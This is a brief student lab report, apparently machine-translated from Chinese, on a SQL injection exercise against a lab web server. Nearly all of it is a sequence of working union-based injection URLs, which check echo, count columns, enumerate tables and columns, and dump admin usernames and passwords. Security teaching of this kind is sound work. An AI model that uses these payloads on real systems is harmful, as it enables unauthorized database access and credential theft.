当前位置：网站首页>SQL injection experiment

SQL injection experiment

2022-06-13 08:17:00 【BT youth】

The experiment purpose

Make students understand SQL Injection principle and utilization method

Experimental content

Experimental target URL：http://10.110.2.145:8008/

Get through manual injection admin Password of the account
Screenshot of the experiment process , There must be payload And result screenshot

Screenshot of the experiment process

SQL Manual injection

http://10.110.2.145:8008/article.php?id=1 and 1=1 # With echo

http://10.110.2.145:8008/article.php?id=1 and 1=2 # No echo

Order by Determine the number of fields

http://10.110.2.145:8008/article.php?id=1 order by 18 # With echo

http://10.110.2.145:8008/article.php?id=1 order by 19 # No echo

Get the current database ：

http://10.110.2.145:8008/article.php?id=-1 union select 1,(database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

Get the table of the current database ：

http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

obtain yzsoumember Table fields ：

http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’yzsoumember’),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

obtain yzsoumember Exterior and interior username,password Field contents ：

http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(username,password) from jian.yzsoumember),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18